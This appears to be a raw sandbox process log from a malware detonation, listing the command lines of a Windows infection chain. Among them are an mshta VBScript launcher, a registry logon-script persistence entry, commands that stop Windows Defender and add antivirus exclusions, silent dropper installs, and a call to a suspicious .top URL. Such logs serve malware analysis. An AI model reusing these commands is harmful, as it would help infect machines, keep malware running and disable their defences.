"C:\Users\Admin\Documents\DcuJbapcOStMsK_sofvjH1rd.exe"
C:\Users\Admin\Documents\QHKSwlfN2a2ZEq9KKEivqPlv.exe
"C:\Users\Admin\Documents\QHKSwlfN2a2ZEq9KKEivqPlv.exe"
C:\Users\Admin\AppData\Roaming\2297678.exe
"C:\Users\Admin\AppData\Roaming\2297678.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\qj6XhKnUZ4CBbCjZlcL3OlGx.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\qj6XhKnUZ4CBbCjZlcL3OlGx.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\AppData\Local\Temp\tmp9F4E_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp9F4E_tmp.exe"
C:\Users\Admin\AppData\Roaming\5673775.exe
"C:\Users\Admin\AppData\Roaming\5673775.exe"
C:\Users\Admin\Documents\qj6XhKnUZ4CBbCjZlcL3OlGx.exe
"C:\Users\Admin\Documents\qj6XhKnUZ4CBbCjZlcL3OlGx.exe"
C:\Users\Admin\Documents\4cG2xxeuRqqMERqbrJ3qz4Xy.exe
"C:\Users\Admin\Documents\4cG2xxeuRqqMERqbrJ3qz4Xy.exe"
C:\Users\Admin\Documents\Lghg4c3DhujKezb8QrcV7Pg1.exe
"C:\Users\Admin\Documents\Lghg4c3DhujKezb8QrcV7Pg1.exe"
C:\Users\Admin\Documents\J6vAkH5kawOVLHYY8QC6PvMX.exe
"C:\Users\Admin\Documents\J6vAkH5kawOVLHYY8QC6PvMX.exe"
C:\Users\Admin\Documents\YSvOpD61YkvvwSwmM3JQ9_ms.exe
"C:\Users\Admin\Documents\YSvOpD61YkvvwSwmM3JQ9_ms.exe"
C:\Users\Admin\Documents\nHdE_zfL0310gEydEjYekZwa.exe
"C:\Users\Admin\Documents\nHdE_zfL0310gEydEjYekZwa.exe"
C:\Users\Admin\Documents\AGDhhP4Kqn9gOY9xkf9z3bL1.exe
"C:\Users\Admin\Documents\AGDhhP4Kqn9gOY9xkf9z3bL1.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\qj6XhKnUZ4CBbCjZlcL3OlGx.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\qj6XhKnUZ4CBbCjZlcL3OlGx.exe" ) do taskkill -f -iM "%~NxA"
C:\Users\Admin\AppData\Roaming\3528019.exe
"C:\Users\Admin\AppData\Roaming\3528019.exe"
C:\Users\Admin\AppData\Local\Temp\is-A6LKA.tmp\AGDhhP4Kqn9gOY9xkf9z3bL1.tmp
"C:\Users\Admin\AppData\Local\Temp\is-A6LKA.tmp\AGDhhP4Kqn9gOY9xkf9z3bL1.tmp" /SL5="$1050A,138429,56832,C:\Users\Admin\Documents\AGDhhP4Kqn9gOY9xkf9z3bL1.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 6256 -ip 6256
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5704 -ip 5704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 2420
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 320
C:\Users\Admin\AppData\Local\Temp\is-9L90V.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-9L90V.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "qj6XhKnUZ4CBbCjZlcL3OlGx.exe"
C:\Users\Admin\Documents\1W66d4PrbYOtmxlxfQV7OpB0.exe
C:\Users\Admin\Documents\1W66d4PrbYOtmxlxfQV7OpB0.exe
C:\Users\Admin\Documents\ylquALTsOTov0ohMF2vhTPvm.exe
C:\Users\Admin\Documents\ylquALTsOTov0ohMF2vhTPvm.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1720 -ip 1720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 1864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 6200 -ip 6200
C:\Users\Admin\Documents\DcuJbapcOStMsK_sofvjH1rd.exe
"C:\Users\Admin\Documents\DcuJbapcOStMsK_sofvjH1rd.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 6348 -ip 6348
C:\Users\Admin\AppData\Local\Temp\C50.exe
C:\Users\Admin\AppData\Local\Temp\C50.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 280
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 836 -p 6240 -ip 6240
C:\Users\Admin\Documents\QHKSwlfN2a2ZEq9KKEivqPlv.exe
"C:\Users\Admin\Documents\QHKSwlfN2a2ZEq9KKEivqPlv.exe" -q
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Users\Admin\AppData\Local\Temp\152B.exe
C:\Users\Admin\AppData\Local\Temp\152B.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 876 -ip 876
C:\Users\Admin\AppData\Local\Temp\is-6G441.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-6G441.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 880 -p 6152 -ip 6152
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 296
C:\Users\Admin\AppData\Roaming\5318543.exe
"C:\Users\Admin\AppData\Roaming\5318543.exe"
C:\Users\Admin\AppData\Roaming\4464286.exe
"C:\Users\Admin\AppData\Roaming\4464286.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 7956 -ip 7956
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6316 -ip 6316
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 900 -p 6184 -ip 6184
C:\Users\Admin\AppData\Roaming\4717428.exe
"C:\Users\Admin\AppData\Roaming\4717428.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6316 -s 312
C:\Users\Admin\AppData\Roaming\4158939.exe
"C:\Users\Admin\AppData\Roaming\4158939.exe"
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 288
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 908 -p 7520 -ip 7520
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Users\Admin\Documents\MErB0oiECFInvOnN0pMZsfJQ.exe
"C:\Users\Admin\Documents\MErB0oiECFInvOnN0pMZsfJQ.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 0FFB766CFAD2B8EEBC1FA3E4273DB98E C
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Users\Admin\AppData\Local\Temp\is-MC5C6.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-MC5C6.tmp\Setup.exe" /silent /subid=720
C:\Users\Admin\AppData\Local\Temp\is-KEK3J.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-KEK3J.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 452
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 844 -p 6552 -ip 6552
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\is-4J0BN.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4J0BN.tmp\Setup.tmp" /SL5="$2045C,17361482,721408,C:\Users\Admin\AppData\Local\Temp\is-KEK3J.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp" /SL5="$2045E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-MC5C6.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-CMSRA.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 276
C:\Users\Admin\AppData\Local\Temp\5AA1.exe
C:\Users\Admin\AppData\Local\Temp\5AA1.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 836 -p 4996 -ip 4996
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403838 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 292
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-CMSRA.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding D65BC8E04F1EF4709EB32F6824596A23 C
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 8509C7C744AA63035D60300FADEC6A49 C
C:\Users\Admin\AppData\Local\Temp\83C5.exe
C:\Users\Admin\AppData\Local\Temp\83C5.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 844 -p 3872 -ip 3872
C:\Program Files\Uninstall Information\QAEOFVAETU\ultramediaburner.exe
"C:\Program Files\Uninstall Information\QAEOFVAETU\ultramediaburner.exe" /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\41-f4462-e95-46ea2-f67ab5203337b\Maeveseqaeba.exe
"C:\Users\Admin\AppData\Local\Temp\41-f4462-e95-46ea2-f67ab5203337b\Maeveseqaeba.exe"
C:\Users\Admin\AppData\Local\Temp\is-0LL2G.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0LL2G.tmp\ultramediaburner.tmp" /SL5="$3053C,281924,62464,C:\Program Files\Uninstall Information\QAEOFVAETU\ultramediaburner.exe" /VERYSILENT
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding CC1F53D7F85920F3B7B6D299CD5980C6
C:\Users\Admin\AppData\Local\Temp\00-a79cc-ea8-70996-092bf3e5830ae\Numaetetegae.exe
"C:\Users\Admin\AppData\Local\Temp\00-a79cc-ea8-70996-092bf3e5830ae\Numaetetegae.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3872 -s 2324
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-9L90V.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-9L90V.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403838 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5164 -ip 5164
C:\Users\Admin\AppData\Local\Temp\A9EC.exe
C:\Users\Admin\AppData\Local\Temp\A9EC.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5164 -s 2472
C:\Users\Admin\AppData\Local\Temp\is-CMSRA.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-CMSRA.tmp\{app}\vdi_compiler"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=721
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 600 -p 3400 -ip 3400
C:\Users\Admin\AppData\Local\Temp\B826.exe
C:\Users\Admin\AppData\Local\Temp\B826.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3400 -s 2320
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403838 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 7596 -ip 7596
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7596 -s 2460
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 6244 -ip 6244
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 288
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\EA23.exe
C:\Users\Admin\AppData\Local\Temp\EA23.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ps5lxaxw.sjs\GcleanerEU.exe /eufive & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jctrnkq0.13m\installer.exe /qn CAMPAIGN="654" & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b5l4ub4a.v11\ufgaa.exe & exit
C:\Users\Admin\AppData\Local\Temp\jctrnkq0.13m\installer.exe
C:\Users\Admin\AppData\Local\Temp\jctrnkq0.13m\installer.exe /qn CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\686.exe
C:\Users\Admin\AppData\Local\Temp\686.exe
C:\Users\Admin\AppData\Local\Temp\8AA.exe
C:\Users\Admin\AppData\Local\Temp\8AA.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=721
C:\Users\Admin\AppData\Local\Temp\E77.exe
C:\Users\Admin\AppData\Local\Temp\E77.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa41e946f8,0x7ffa41e94708,0x7ffa41e94718
C:\Users\Admin\AppData\Local\Temp\ps5lxaxw.sjs\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\ps5lxaxw.sjs\GcleanerEU.exe /eufive
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1rfv4ayr.evh\anyname.exe & exit
C:\Users\Admin\AppData\Local\Temp\1rfv4ayr.evh\anyname.exe
C:\Users\Admin\AppData\Local\Temp\1rfv4ayr.evh\anyname.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5fyqerig.fmw\gcleaner.exe /mixfive & exit
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\Users\Admin\AppData\Local\Temp\8c6fb647-a92e-4570-b278-032daed86e54\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\8c6fb647-a92e-4570-b278-032daed86e54\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8c6fb647-a92e-4570-b278-032daed86e54\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
C:\Users\Admin\AppData\Local\Temp\2106.exe
C:\Users\Admin\AppData\Local\Temp\2106.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 73AE46420040090803390E770D37AEF1 C
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8c6fb647-a92e-4570-b278-032daed86e54\test.bat"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2580 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2264 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
C:\Windows\system32\sc.exe
sc stop windefend
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3832 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3848 /prefetch:1
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 9300 -ip 9300
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{266bc9aa-95a3-0042-910c-721f65887538}\oemvista.inf" "9" "4d14a44ff" "0000000000000158" "WinSta0\Default" "0000000000000168" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 864 -p 9548 -ip 9548
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 888 -p 10880 -ip 10880
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9548 -s 296
C:\Users\Admin\AppData\Local\Temp\1rfv4ayr.evh\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\1rfv4ayr.evh\anyname.exe" -q
C:\Users\Admin\AppData\Local\Temp\5fyqerig.fmw\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\5fyqerig.fmw\gcleaner.exe /mixfive
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uspzfnjo.jyj\autosubplayer.exe /S & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9300 -s 292
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2044 /prefetch:1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\EA23.exe" -Force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10880 -s 880
C:\Users\Admin\AppData\Local\Temp\EA23.exe
C:\Users\Admin\AppData\Local\Temp\EA23.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 12132 -ip 12132
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000010C" "fff3"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 12132 -s 836
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3384 /prefetch:8
C:\Windows\System32\svchost.exe
